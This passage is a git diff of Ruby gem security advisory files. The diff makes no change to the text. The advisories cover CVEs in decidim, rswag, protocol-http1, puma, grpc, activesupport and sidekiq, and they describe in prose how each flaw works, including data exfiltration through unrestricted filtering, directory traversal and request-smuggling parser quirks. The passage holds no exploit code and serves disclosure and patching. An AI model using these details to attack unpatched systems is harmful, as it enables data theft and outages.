+    - https://github.com/decidim/decidim/releases/tag/v0.27.3
+    - https://github.com/advisories/GHSA-5652-92r9-3fx9
+---
diff --git a/advisories/_posts/2023-07-11-CVE-2023-34090.md b/advisories/_posts/2023-07-11-CVE-2023-34090.md
index 5dbf9d27..56942c33 100644
--- a/advisories/_posts/2023-07-11-CVE-2023-34090.md
+++ b/advisories/_posts/2023-07-11-CVE-2023-34090.md
@@ -1,41 +1,41 @@
----
-layout: advisory
-title: 'CVE-2023-34090 (decidim): Decidim vulnerable to sensitive data disclosure'
-comments: false
-categories:
-- decidim
-advisory:
-  gem: decidim
-  cve: 2023-34090
-  ghsa: jm79-9pm4-vrw9
-  url: https://github.com/decidim/decidim/security/advisories/GHSA-jm79-9pm4-vrw9
-  title: Decidim vulnerable to sensitive data disclosure
-  date: 2023-07-11
-  description: |
-    Note: added the actual report as a [comment](https://github.com/decidim/decidim/security/advisories/GHSA-jm79-9pm4-vrw9#advisory-comment-81110).
-
-    ### Summary
-
-    Decidim, a platform for digital citizen participation, uses a third-party library named Ransack for filtering certain database collections (e.g., public meetings). By default, this library allows filtering on all data attributes and associations. This allows an unauthenticated remote attacker to exfiltrate non-public data from the underlying database of a Decidim instance (e.g., exfiltrating data from the user table).
-
-    ### Impact
-    This issue may lead to Sensitive Data Disclosure.
-
-    ### Patches
-    The problem was patched in [v0.27.3](https://github.com/decidim/decidim/releases/tag/v0.27.3).
-
-    ### Workarounds
-    Disable or unpublish all meetings components from your application.
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 0.27.0"
-  patched_versions:
-  - ">= 0.27.3"
-  related:
-    url:
-    - https://github.com/decidim/decidim/security/advisories/GHSA-jm79-9pm4-vrw9
-    - https://github.com/decidim/decidim/security/advisories/GHSA-jm79-9pm4-vrw9#advisory-comment-81110
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-34090
-    - https://github.com/decidim/decidim/releases/tag/v0.27.3
-    - https://github.com/advisories/GHSA-jm79-9pm4-vrw9
----
+---
+layout: advisory
+title: 'CVE-2023-34090 (decidim): Decidim vulnerable to sensitive data disclosure'
+comments: false
+categories:
+- decidim
+advisory:
+  gem: decidim
+  cve: 2023-34090
+  ghsa: jm79-9pm4-vrw9
+  url: https://github.com/decidim/decidim/security/advisories/GHSA-jm79-9pm4-vrw9
+  title: Decidim vulnerable to sensitive data disclosure
+  date: 2023-07-11
+  description: |
+    Note: added the actual report as a [comment](https://github.com/decidim/decidim/security/advisories/GHSA-jm79-9pm4-vrw9#advisory-comment-81110).
+
+    ### Summary
+
+    Decidim, a platform for digital citizen participation, uses a third-party library named Ransack for filtering certain database collections (e.g., public meetings). By default, this library allows filtering on all data attributes and associations. This allows an unauthenticated remote attacker to exfiltrate non-public data from the underlying database of a Decidim instance (e.g., exfiltrating data from the user table).
+
+    ### Impact
+    This issue may lead to Sensitive Data Disclosure.
+
+    ### Patches
+    The problem was patched in [v0.27.3](https://github.com/decidim/decidim/releases/tag/v0.27.3).
+
+    ### Workarounds
+    Disable or unpublish all meetings components from your application.
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 0.27.0"
+  patched_versions:
+  - ">= 0.27.3"
+  related:
+    url:
+    - https://github.com/decidim/decidim/security/advisories/GHSA-jm79-9pm4-vrw9
+    - https://github.com/decidim/decidim/security/advisories/GHSA-jm79-9pm4-vrw9#advisory-comment-81110
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-34090
+    - https://github.com/decidim/decidim/releases/tag/v0.27.3
+    - https://github.com/advisories/GHSA-jm79-9pm4-vrw9
+---
diff --git a/advisories/_posts/2023-07-15-CVE-2023-38337.md b/advisories/_posts/2023-07-15-CVE-2023-38337.md
index 88997120..8be6a18c 100644
--- a/advisories/_posts/2023-07-15-CVE-2023-38337.md
+++ b/advisories/_posts/2023-07-15-CVE-2023-38337.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2023-38337 (rswag): rswag vulnerable to arbitrary JSON and YAML file read
-  via directory traversal'
-comments: false
-categories:
-- rswag
-advisory:
-  gem: rswag
-  cve: 2023-38337
-  ghsa: vc79-65pr-q82v
-  url: https://github.com/rswag/rswag/issues/653
-  title: rswag vulnerable to arbitrary JSON and YAML file read via directory traversal
-  date: 2023-07-15
-  description: |
-    rswag before 2.10.1 allows remote attackers to read arbitrary JSON and
-    YAML files via directory traversal, because rswag-api can expose a file that is
-    not the OpenAPI (or Swagger) specification file of a project.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 2.10.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-38337
-    - https://github.com/rswag/rswag/issues/653
-    - https://github.com/rswag/rswag/compare/2.9.0...2.10.1
-    - https://github.com/advisories/GHSA-vc79-65pr-q82v
----
+---
+layout: advisory
+title: 'CVE-2023-38337 (rswag): rswag vulnerable to arbitrary JSON and YAML file read
+  via directory traversal'
+comments: false
+categories:
+- rswag
+advisory:
+  gem: rswag
+  cve: 2023-38337
+  ghsa: vc79-65pr-q82v
+  url: https://github.com/rswag/rswag/issues/653
+  title: rswag vulnerable to arbitrary JSON and YAML file read via directory traversal
+  date: 2023-07-15
+  description: |
+    rswag before 2.10.1 allows remote attackers to read arbitrary JSON and
+    YAML files via directory traversal, because rswag-api can expose a file that is
+    not the OpenAPI (or Swagger) specification file of a project.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 2.10.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-38337
+    - https://github.com/rswag/rswag/issues/653
+    - https://github.com/rswag/rswag/compare/2.9.0...2.10.1
+    - https://github.com/advisories/GHSA-vc79-65pr-q82v
+---
diff --git a/advisories/_posts/2023-08-03-CVE-2023-38697.md b/advisories/_posts/2023-08-03-CVE-2023-38697.md
index 22dc2a35..00f0f3b3 100644
--- a/advisories/_posts/2023-08-03-CVE-2023-38697.md
+++ b/advisories/_posts/2023-08-03-CVE-2023-38697.md
@@ -1,66 +1,66 @@
----
-layout: advisory
-title: 'CVE-2023-38697 (protocol-http1): protocol-http1 HTTP Request/Response Smuggling
-  vulnerability'
-comments: false
-categories:
-- protocol-http1
-advisory:
-  gem: protocol-http1
-  cve: 2023-38697
-  ghsa: 6jwc-qr2q-7xwj
-  url: https://github.com/socketry/protocol-http1/security/advisories/GHSA-6jwc-qr2q-7xwj
-  title: protocol-http1 HTTP Request/Response Smuggling vulnerability
-  date: 2023-08-03
-  description: |
-    ### Impact
-
-    [RFC 9112 Section 7.1](https://www.rfc-editor.org/rfc/rfc9112#name-chunked-transfer-coding)
-    defined the format of chunk size, chunk data and chunk
-    extension (detailed ABNF is in Appendix section).
-
-    In summary:
-
-    - The value of Content-Length header should be a string of 0-9 digits.
-    - The chunk size should be a string of hex digits and should split
-       from chunk data using CRLF.
-    - The chunk extension shouldn't contain any invisible character.
-
-    However, we found that Falcon has following behaviors while
-    disobey the corresponding RFCs.
-
-    - Falcon accepts Content-Length header values that have "+" prefix.
-    - Falcon accepts Content-Length header values that written in
-      hexadecimal with "0x" prefix.
-    - Falcon accepts "0x" and "+" prefixed chunk size.
-    - Falcon accepts LF in chunk extension.
-
-    This behavior can lead to desync when forwarding through multiple
-    HTTP parsers, potentially results in HTTP request smuggling and
-    firewall bypassing. Note that while these issues were reproduced
-    in Falcon (the server), the issue is with `protocol-http1` which
-    implements the HTTP/1 protocol parser. We have not yet been advised
-    of any real world exploit or practical attack.
-
-    ### Patches
-
-    Fixed in `protocol-http1` v0.15.1+.
-
-    ### Workarounds
-
-    No.
-
-    ### References
-
-    https://github.com/socketry/protocol-http1/pull/20
-  cvss_v3: 5.8
-  patched_versions:
-  - ">= 0.15.1"
-  related:
-    url:
-    - https://github.com/socketry/protocol-http1/security/advisories/GHSA-6jwc-qr2q-7xwj
-    - https://github.com/socketry/protocol-http1/pull/20
-    - https://github.com/socketry/protocol-http1/commit/e11fc164fd2b36f7b7e785e69fa8859eb06bcedd
-    - https://github.com/advisories/GHSA-6jwc-qr2q-7xwj
-  notes: CVE-2023-38697 not yet published
----
+---
+layout: advisory
+title: 'CVE-2023-38697 (protocol-http1): protocol-http1 HTTP Request/Response Smuggling
+  vulnerability'
+comments: false
+categories:
+- protocol-http1
+advisory:
+  gem: protocol-http1
+  cve: 2023-38697
+  ghsa: 6jwc-qr2q-7xwj
+  url: https://github.com/socketry/protocol-http1/security/advisories/GHSA-6jwc-qr2q-7xwj
+  title: protocol-http1 HTTP Request/Response Smuggling vulnerability
+  date: 2023-08-03
+  description: |
+    ### Impact
+
+    [RFC 9112 Section 7.1](https://www.rfc-editor.org/rfc/rfc9112#name-chunked-transfer-coding)
+    defined the format of chunk size, chunk data and chunk
+    extension (detailed ABNF is in Appendix section).
+
+    In summary:
+
+    - The value of Content-Length header should be a string of 0-9 digits.
+    - The chunk size should be a string of hex digits and should split
+       from chunk data using CRLF.
+    - The chunk extension shouldn't contain any invisible character.
+
+    However, we found that Falcon has following behaviors while
+    disobey the corresponding RFCs.
+
+    - Falcon accepts Content-Length header values that have "+" prefix.
+    - Falcon accepts Content-Length header values that written in
+      hexadecimal with "0x" prefix.
+    - Falcon accepts "0x" and "+" prefixed chunk size.
+    - Falcon accepts LF in chunk extension.
+
+    This behavior can lead to desync when forwarding through multiple
+    HTTP parsers, potentially results in HTTP request smuggling and
+    firewall bypassing. Note that while these issues were reproduced
+    in Falcon (the server), the issue is with `protocol-http1` which
+    implements the HTTP/1 protocol parser. We have not yet been advised
+    of any real world exploit or practical attack.
+
+    ### Patches
+
+    Fixed in `protocol-http1` v0.15.1+.
+
+    ### Workarounds
+
+    No.
+
+    ### References
+
+    https://github.com/socketry/protocol-http1/pull/20
+  cvss_v3: 5.8
+  patched_versions:
+  - ">= 0.15.1"
+  related:
+    url:
+    - https://github.com/socketry/protocol-http1/security/advisories/GHSA-6jwc-qr2q-7xwj
+    - https://github.com/socketry/protocol-http1/pull/20
+    - https://github.com/socketry/protocol-http1/commit/e11fc164fd2b36f7b7e785e69fa8859eb06bcedd
+    - https://github.com/advisories/GHSA-6jwc-qr2q-7xwj
+  notes: CVE-2023-38697 not yet published
+---
diff --git a/advisories/_posts/2023-08-08-GHSA-7vh7-fw88-wj87.md b/advisories/_posts/2023-08-08-GHSA-7vh7-fw88-wj87.md
index 10d380a2..a138dd64 100644
--- a/advisories/_posts/2023-08-08-GHSA-7vh7-fw88-wj87.md
+++ b/advisories/_posts/2023-08-08-GHSA-7vh7-fw88-wj87.md
@@ -1,43 +1,43 @@
----
-layout: advisory
-title: 'GHSA-7vh7-fw88-wj87 (commonmarker): Several quadratic complexity bugs may
-  lead to denial of service in Commonmarker'
-comments: false
-categories:
-- commonmarker
-advisory:
-  gem: commonmarker
-  ghsa: 7vh7-fw88-wj87
-  url: https://github.com/gjtorikian/commonmarker/security/advisories/GHSA-7vh7-fw88-wj87
-  title: Several quadratic complexity bugs may lead to denial of service in Commonmarker
-  date: 2023-08-08
-  description: |
-    ## Impact
-
-    Several quadratic complexity bugs in commonmarker's underlying
-    [`cmark-gfm`](https://github.com/github/cmark-gfm) library may
-    lead to unbounded resource exhaustion and subsequent denial of service.
-
-    The following vulnerabilities were addressed:
-
-    * [CVE-2023-37463](https://github.com/github/cmark-gfm/security/advisories/GHSA-w4qg-3vf7-m9x5)
-
-    For more information, consult the release notes for version
-    [`0.29.0.gfm.12`](https://github.com/github/cmark-gfm/releases/tag/0.29.0.gfm.12).
-
-    ## Mitigation
-
-    Users are advised to upgrade to commonmarker version
-    [`0.23.10`](https://rubygems.org/gems/commonmarker/versions/0.23.10).
-  patched_versions:
-  - ">= 0.23.10"
-  related:
-    url:
-    - https://github.com/gjtorikian/commonmarker/security/advisories/GHSA-7vh7-fw88-wj87
-    - https://github.com/github/cmark-gfm/releases/tag/0.29.0.gfm.12
-    - https://github.com/gjtorikian/commonmarker/commit/db8cd377b54541f7fd484d168b7682a282a680f7
-    - https://github.com/github/cmark-gfm/security/advisories/GHSA-w4qg-3vf7-m9x5
-    - https://rubygems.org/gems/commonmarker/versions/0.23.10
-    - https://github.com/advisories/GHSA-7vh7-fw88-wj87
-  notes: No CVE number, no cvss_v2, no cvss_v3
----
+---
+layout: advisory
+title: 'GHSA-7vh7-fw88-wj87 (commonmarker): Several quadratic complexity bugs may
+  lead to denial of service in Commonmarker'
+comments: false
+categories:
+- commonmarker
+advisory:
+  gem: commonmarker
+  ghsa: 7vh7-fw88-wj87
+  url: https://github.com/gjtorikian/commonmarker/security/advisories/GHSA-7vh7-fw88-wj87
+  title: Several quadratic complexity bugs may lead to denial of service in Commonmarker
+  date: 2023-08-08
+  description: |
+    ## Impact
+
+    Several quadratic complexity bugs in commonmarker's underlying
+    [`cmark-gfm`](https://github.com/github/cmark-gfm) library may
+    lead to unbounded resource exhaustion and subsequent denial of service.
+
+    The following vulnerabilities were addressed:
+
+    * [CVE-2023-37463](https://github.com/github/cmark-gfm/security/advisories/GHSA-w4qg-3vf7-m9x5)
+
+    For more information, consult the release notes for version
+    [`0.29.0.gfm.12`](https://github.com/github/cmark-gfm/releases/tag/0.29.0.gfm.12).
+
+    ## Mitigation
+
+    Users are advised to upgrade to commonmarker version
+    [`0.23.10`](https://rubygems.org/gems/commonmarker/versions/0.23.10).
+  patched_versions:
+  - ">= 0.23.10"
+  related:
+    url:
+    - https://github.com/gjtorikian/commonmarker/security/advisories/GHSA-7vh7-fw88-wj87
+    - https://github.com/github/cmark-gfm/releases/tag/0.29.0.gfm.12
+    - https://github.com/gjtorikian/commonmarker/commit/db8cd377b54541f7fd484d168b7682a282a680f7
+    - https://github.com/github/cmark-gfm/security/advisories/GHSA-w4qg-3vf7-m9x5
+    - https://rubygems.org/gems/commonmarker/versions/0.23.10
+    - https://github.com/advisories/GHSA-7vh7-fw88-wj87
+  notes: No CVE number, no cvss_v2, no cvss_v3
+---
diff --git a/advisories/_posts/2023-08-09-CVE-2023-33953.md b/advisories/_posts/2023-08-09-CVE-2023-33953.md
index 55495464..851e757b 100644
--- a/advisories/_posts/2023-08-09-CVE-2023-33953.md
+++ b/advisories/_posts/2023-08-09-CVE-2023-33953.md
@@ -1,54 +1,54 @@
----
-layout: advisory
-title: 'CVE-2023-33953 (grpc): Excessive Iteration in gRPC'
-comments: false
-categories:
-- grpc
-advisory:
-  gem: grpc
-  cve: 2023-33953
-  ghsa: 496j-2rq6-j6cc
-  url: https://github.com/advisories/GHSA-496j-2rq6-j6cc
-  title: Excessive Iteration in gRPC
-  date: 2023-08-09
-  description: |
-    gRPC contains a vulnerability that allows hpack table accounting
-    errors could lead to unwanted disconnects between clients and
-    servers in exceptional cases/ Three vectors were found that allow
-    the following DOS attacks:
-
-    - Unbounded memory buffering in the HPACK parser
-    - Unbounded CPU consumption in the HPACK parser
-
-    The unbounded CPU consumption is down to a copy that occurred
-    per-input-block in the parser, and because that could be unbounded
-    due to the memory copy bug we end up with an O(n^2) parsing loop,
-    with n selected by the client.
-
-    The unbounded memory buffering bugs:
-
-    - The header size limit check was behind the string reading code,
-      so we needed to first buffer up to a 4 gigabyte string before
-      rejecting it as longer than 8 or 16kb.
-
-    - HPACK varints have an encoding quirk whereby an infinite number
-      of 0’s can be added at the start of an integer. gRPC’s hpack
-      parser needed to read all of them before concluding a parse.
-
-    - gRPC’s metadata overflow check was performed per frame, so that
-      the following sequence of frames could cause infinite buffering:
-      HEADERS: containing a: 1 CONTINUATION: containing a: 2 CONTINUATION:
-      containing a: 3 etc…
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 1.53.2"
-  - "~> 1.54.3"
-  - "~> 1.55.2"
-  - ">= 1.56.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-33953
-    - https://cloud.google.com/support/bulletins#gcp-2023-022
-    - https://security.snyk.io/vuln/SNYK-RUBY-GRPC-5834442
-    - https://github.com/advisories/GHSA-496j-2rq6-j6cc
----
+---
+layout: advisory
+title: 'CVE-2023-33953 (grpc): Excessive Iteration in gRPC'
+comments: false
+categories:
+- grpc
+advisory:
+  gem: grpc
+  cve: 2023-33953
+  ghsa: 496j-2rq6-j6cc
+  url: https://github.com/advisories/GHSA-496j-2rq6-j6cc
+  title: Excessive Iteration in gRPC
+  date: 2023-08-09
+  description: |
+    gRPC contains a vulnerability that allows hpack table accounting
+    errors could lead to unwanted disconnects between clients and
+    servers in exceptional cases/ Three vectors were found that allow
+    the following DOS attacks:
+
+    - Unbounded memory buffering in the HPACK parser
+    - Unbounded CPU consumption in the HPACK parser
+
+    The unbounded CPU consumption is down to a copy that occurred
+    per-input-block in the parser, and because that could be unbounded
+    due to the memory copy bug we end up with an O(n^2) parsing loop,
+    with n selected by the client.
+
+    The unbounded memory buffering bugs:
+
+    - The header size limit check was behind the string reading code,
+      so we needed to first buffer up to a 4 gigabyte string before
+      rejecting it as longer than 8 or 16kb.
+
+    - HPACK varints have an encoding quirk whereby an infinite number
+      of 0’s can be added at the start of an integer. gRPC’s hpack
+      parser needed to read all of them before concluding a parse.
+
+    - gRPC’s metadata overflow check was performed per frame, so that
+      the following sequence of frames could cause infinite buffering:
+      HEADERS: containing a: 1 CONTINUATION: containing a: 2 CONTINUATION:
+      containing a: 3 etc…
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 1.53.2"
+  - "~> 1.54.3"
+  - "~> 1.55.2"
+  - ">= 1.56.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-33953
+    - https://cloud.google.com/support/bulletins#gcp-2023-022
+    - https://security.snyk.io/vuln/SNYK-RUBY-GRPC-5834442
+    - https://github.com/advisories/GHSA-496j-2rq6-j6cc
+---
diff --git a/advisories/_posts/2023-08-18-CVE-2023-40175.md b/advisories/_posts/2023-08-18-CVE-2023-40175.md
index fb022ffa..4d7b011d 100644
--- a/advisories/_posts/2023-08-18-CVE-2023-40175.md
+++ b/advisories/_posts/2023-08-18-CVE-2023-40175.md
@@ -1,47 +1,47 @@
----
-layout: advisory
-title: 'CVE-2023-40175 (puma): Inconsistent Interpretation of HTTP Requests (''HTTP
-  Request/Response Smuggling'') in puma'
-comments: false
-categories:
-- puma
-advisory:
-  gem: puma
-  cve: 2023-40175
-  ghsa: 68xg-gqqm-vgj8
-  url: https://github.com/puma/puma/security/advisories/GHSA-68xg-gqqm-vgj8
-  title: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
-    in puma
-  date: 2023-08-18
-  description: |
-    ### Impact
-
-    Prior to version 6.3.1, puma exhibited incorrect behavior when parsing chunked transfer encoding bodies and zero-length Content-Length headers in a way that allowed HTTP request smuggling.
-
-    The following vulnerabilities are addressed by this advisory:
-    - Incorrect parsing of trailing fields in chunked transfer encoding bodies
-    - Parsing of blank/zero-length Content-Length headers`\r\n`
-
-    ### Patches
-
-    The vulnerability has been fixed in 6.3.1 and 5.6.7.
-
-    ### Workarounds
-
-    No known workarounds.
-
-    ### References
-
-    [HTTP Request Smuggling](https://portswigger.net/web-security/request-smuggling)
-  cvss_v3: 6.5
-  patched_versions:
-  - "~> 5.6.7"
-  - ">= 6.3.1"
-  related:
-    url:
-    - https://github.com/puma/puma/releases/tag/v5.6.7
-    - https://github.com/puma/puma/releases/tag/v6.3.1
-    - https://github.com/puma/puma/commit/690155e7d644b80eeef0a6094f9826ee41f1080a
-    - https://github.com/puma/puma/commit/ed0f2f94b56982c687452504b95d5f1fbbe3eed1
-    - https://github.com/advisories/GHSA-68xg-gqqm-vgj8
----
+---
+layout: advisory
+title: 'CVE-2023-40175 (puma): Inconsistent Interpretation of HTTP Requests (''HTTP
+  Request/Response Smuggling'') in puma'
+comments: false
+categories:
+- puma
+advisory:
+  gem: puma
+  cve: 2023-40175
+  ghsa: 68xg-gqqm-vgj8
+  url: https://github.com/puma/puma/security/advisories/GHSA-68xg-gqqm-vgj8
+  title: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
+    in puma
+  date: 2023-08-18
+  description: |
+    ### Impact
+
+    Prior to version 6.3.1, puma exhibited incorrect behavior when parsing chunked transfer encoding bodies and zero-length Content-Length headers in a way that allowed HTTP request smuggling.
+
+    The following vulnerabilities are addressed by this advisory:
+    - Incorrect parsing of trailing fields in chunked transfer encoding bodies
+    - Parsing of blank/zero-length Content-Length headers`\r\n`
+
+    ### Patches
+
+    The vulnerability has been fixed in 6.3.1 and 5.6.7.
+
+    ### Workarounds
+
+    No known workarounds.
+
+    ### References
+
+    [HTTP Request Smuggling](https://portswigger.net/web-security/request-smuggling)
+  cvss_v3: 6.5
+  patched_versions:
+  - "~> 5.6.7"
+  - ">= 6.3.1"
+  related:
+    url:
+    - https://github.com/puma/puma/releases/tag/v5.6.7
+    - https://github.com/puma/puma/releases/tag/v6.3.1
+    - https://github.com/puma/puma/commit/690155e7d644b80eeef0a6094f9826ee41f1080a
+    - https://github.com/puma/puma/commit/ed0f2f94b56982c687452504b95d5f1fbbe3eed1
+    - https://github.com/advisories/GHSA-68xg-gqqm-vgj8
+---
diff --git a/advisories/_posts/2023-08-23-CVE-2023-38037.md b/advisories/_posts/2023-08-23-CVE-2023-38037.md
index 1f3e08e1..155e3b6d 100644
--- a/advisories/_posts/2023-08-23-CVE-2023-38037.md
+++ b/advisories/_posts/2023-08-23-CVE-2023-38037.md
@@ -1,62 +1,62 @@
----
-layout: advisory
-title: 'CVE-2023-38037 (activesupport): Possible File Disclosure of Locally Encrypted
-  Files'
-comments: false
-categories:
-- activesupport
-- rails
-advisory:
-  gem: activesupport
-  framework: rails
-  cve: 2023-38037
-  ghsa: cr5q-6q9f-rq6q
-  url: https://github.com/rails/rails/releases/tag/v7.0.7.1
-  title: Possible File Disclosure of Locally Encrypted Files
-  date: 2023-08-23
-  description: |
-    There is a possible file disclosure of locally encrypted files in
-    Active Support. This vulnerability has been assigned the
-    CVE identifier CVE-2023-38037.
-
-    * Versions Affected: >= 5.2.0
-    * Not affected: < 5.2.0
-    * Fixed Versions: 7.0.7.1, 6.1.7.5
-
-    # Impact
-
-    ActiveSupport::EncryptedFile writes contents that will be encrypted
-    to a temporary file. The temporary file’s permissions are defaulted
-    to the user’s current umask settings, meaning that it’s possible
-    for other users on the same system to read the contents of the
-    temporary file.
-
-    Attackers that have access to the file system could possibly read
-    the contents of this temporary file while a user is editing it.
-
-    All users running an affected release should either upgrade or use
-    one of the workarounds immediately.
-
-    # Releases
-
-    The fixed releases are available at the normal locations.
-
-    # Workarounds
-
-    To work around this issue, you can set your umask to be more
-    restrictive like this:
-
-      $ umask 0077
-  cvss_v3: 5.5
-  unaffected_versions:
-  - "< 5.2.0"
-  patched_versions:
-  - "~> 6.1.7, >= 6.1.7.5"
-  - ">= 7.0.7.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-38037
-    - https://github.com/rails/rails/releases/tag/v7.0.7.1
-    - https://github.com/rails/rails/commit/a21d6edf35a60383dfa6c4da49e4b1aef5f00731
-    - https://github.com/advisories/GHSA-cr5q-6q9f-rq6q
----
+---
+layout: advisory
+title: 'CVE-2023-38037 (activesupport): Possible File Disclosure of Locally Encrypted
+  Files'
+comments: false
+categories:
+- activesupport
+- rails
+advisory:
+  gem: activesupport
+  framework: rails
+  cve: 2023-38037
+  ghsa: cr5q-6q9f-rq6q
+  url: https://github.com/rails/rails/releases/tag/v7.0.7.1
+  title: Possible File Disclosure of Locally Encrypted Files
+  date: 2023-08-23
+  description: |
+    There is a possible file disclosure of locally encrypted files in
+    Active Support. This vulnerability has been assigned the
+    CVE identifier CVE-2023-38037.
+
+    * Versions Affected: >= 5.2.0
+    * Not affected: < 5.2.0
+    * Fixed Versions: 7.0.7.1, 6.1.7.5
+
+    # Impact
+
+    ActiveSupport::EncryptedFile writes contents that will be encrypted
+    to a temporary file. The temporary file’s permissions are defaulted
+    to the user’s current umask settings, meaning that it’s possible
+    for other users on the same system to read the contents of the
+    temporary file.
+
+    Attackers that have access to the file system could possibly read
+    the contents of this temporary file while a user is editing it.
+
+    All users running an affected release should either upgrade or use
+    one of the workarounds immediately.
+
+    # Releases
+
+    The fixed releases are available at the normal locations.
+
+    # Workarounds
+
+    To work around this issue, you can set your umask to be more
+    restrictive like this:
+
+      $ umask 0077
+  cvss_v3: 5.5
+  unaffected_versions:
+  - "< 5.2.0"
+  patched_versions:
+  - "~> 6.1.7, >= 6.1.7.5"
+  - ">= 7.0.7.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-38037
+    - https://github.com/rails/rails/releases/tag/v7.0.7.1
+    - https://github.com/rails/rails/commit/a21d6edf35a60383dfa6c4da49e4b1aef5f00731
+    - https://github.com/advisories/GHSA-cr5q-6q9f-rq6q
+---
diff --git a/advisories/_posts/2023-09-13-CVE-2023-4785.md b/advisories/_posts/2023-09-13-CVE-2023-4785.md
index 654a82d2..32a4fb50 100644
--- a/advisories/_posts/2023-09-13-CVE-2023-4785.md
+++ b/advisories/_posts/2023-09-13-CVE-2023-4785.md
@@ -1,45 +1,45 @@
----
-layout: advisory
-title: 'CVE-2023-4785 (grpc): Denial of Service Vulnerability in gRPC TCP Server (Posix-compatible
-  platforms)'
-comments: false
-categories:
-- grpc
-advisory:
-  gem: grpc
-  cve: 2023-4785
-  ghsa: p25m-jpj4-qcrr
-  url: https://groups.google.com/g/grpc-io/c/LlLkB1CeE4U
-  title: Denial of Service Vulnerability in gRPC TCP Server (Posix-compatible platforms)
-  date: 2023-09-13
-  description: |
-    Lack of error handling in the TCP server in Google's gRPC starting
-    version 1.23 on posix-compatible platforms (ex. Linux) allows an
-    attacker to cause a denial of service by initiating a significant
-    number of connections with the server.
-
-    Note that gRPC C++ Python, and Ruby are affected, but
-    gRPC Java and Go are NOT affected. 
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 1.53.0"
-  patched_versions:
-  - "~> 1.53.2"
-  - "~> 1.54.3"
-  - "~> 1.55.3"
-  - ">= 1.56.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-4785
-    - https://groups.google.com/g/grpc-io/c/LlLkB1CeE4U
-    - https://rubygems.org/gems/grpc/versions/1.53.2
-    - https://rubygems.org/gems/grpc/versions/1.54.3
-    - https://rubygems.org/gems/grpc/versions/1.55.3
-    - https://rubygems.org/gems/grpc/versions/1.56.2
-    - https://github.com/grpc/grpc/pull/33656
-    - https://github.com/grpc/grpc/pull/33667
-    - https://github.com/grpc/grpc/pull/33669
-    - https://github.com/grpc/grpc/pull/33670
-    - https://github.com/grpc/grpc/pull/33672
-    - https://github.com/advisories/GHSA-p25m-jpj4-qcrr
----
+---
+layout: advisory
+title: 'CVE-2023-4785 (grpc): Denial of Service Vulnerability in gRPC TCP Server (Posix-compatible
+  platforms)'
+comments: false
+categories:
+- grpc
+advisory:
+  gem: grpc
+  cve: 2023-4785
+  ghsa: p25m-jpj4-qcrr
+  url: https://groups.google.com/g/grpc-io/c/LlLkB1CeE4U
+  title: Denial of Service Vulnerability in gRPC TCP Server (Posix-compatible platforms)
+  date: 2023-09-13
+  description: |
+    Lack of error handling in the TCP server in Google's gRPC starting
+    version 1.23 on posix-compatible platforms (ex. Linux) allows an
+    attacker to cause a denial of service by initiating a significant
+    number of connections with the server.
+
+    Note that gRPC C++ Python, and Ruby are affected, but
+    gRPC Java and Go are NOT affected. 
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 1.53.0"
+  patched_versions:
+  - "~> 1.53.2"
+  - "~> 1.54.3"
+  - "~> 1.55.3"
+  - ">= 1.56.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-4785
+    - https://groups.google.com/g/grpc-io/c/LlLkB1CeE4U
+    - https://rubygems.org/gems/grpc/versions/1.53.2
+    - https://rubygems.org/gems/grpc/versions/1.54.3
+    - https://rubygems.org/gems/grpc/versions/1.55.3
+    - https://rubygems.org/gems/grpc/versions/1.56.2
+    - https://github.com/grpc/grpc/pull/33656
+    - https://github.com/grpc/grpc/pull/33667
+    - https://github.com/grpc/grpc/pull/33669
+    - https://github.com/grpc/grpc/pull/33670
+    - https://github.com/grpc/grpc/pull/33672
+    - https://github.com/advisories/GHSA-p25m-jpj4-qcrr
+---
diff --git a/advisories/_posts/2023-09-14-CVE-2023-26141.md b/advisories/_posts/2023-09-14-CVE-2023-26141.md
index 0a406c08..7858f6c1 100644
--- a/advisories/_posts/2023-09-14-CVE-2023-26141.md
+++ b/advisories/_posts/2023-09-14-CVE-2023-26141.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2023-26141 (sidekiq): sidekiq Denial of Service vulnerability'
-comments: false
-categories:
-- sidekiq
-advisory:
-  gem: sidekiq
-  cve: 2023-26141
-  ghsa: 3qc2-v3hp-6cv8
-  url: https://nvd.nist.gov/vuln/detail/CVE-2023-26141
-  title: sidekiq Denial of Service vulnerability
-  date: 2023-09-14
-  description: |
-    Versions of the package sidekiq before 7.1.3 are vulnerable to Denial
-    of Service (DoS) due to insufficient checks in the dashboard-charts.js
-    file. An attacker can exploit this vulnerability by manipulating the
-    localStorage value which will cause excessive polling requests.
-  cvss_v3: 4.9
-  patched_versions:
-  - "~> 6.5.10"
-  - ">= 7.1.3"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-26141
-    - https://github.com/sidekiq/sidekiq/blob/main/Changes.md#713
-    - https://github.com/sidekiq/sidekiq/commit/62c90d7c5a7d8a378d79909859d87c2e0702bf89
-    - https://gist.github.com/keeganparr1/1dffd3c017339b7ed5371ed3d81e6b2a
-    - https://security.snyk.io/vuln/SNYK-RUBY-SIDEKIQ-5885107
-    - https://github.com/sidekiq/sidekiq/blob/6-x/web/assets/javascripts/dashboard.js#L6
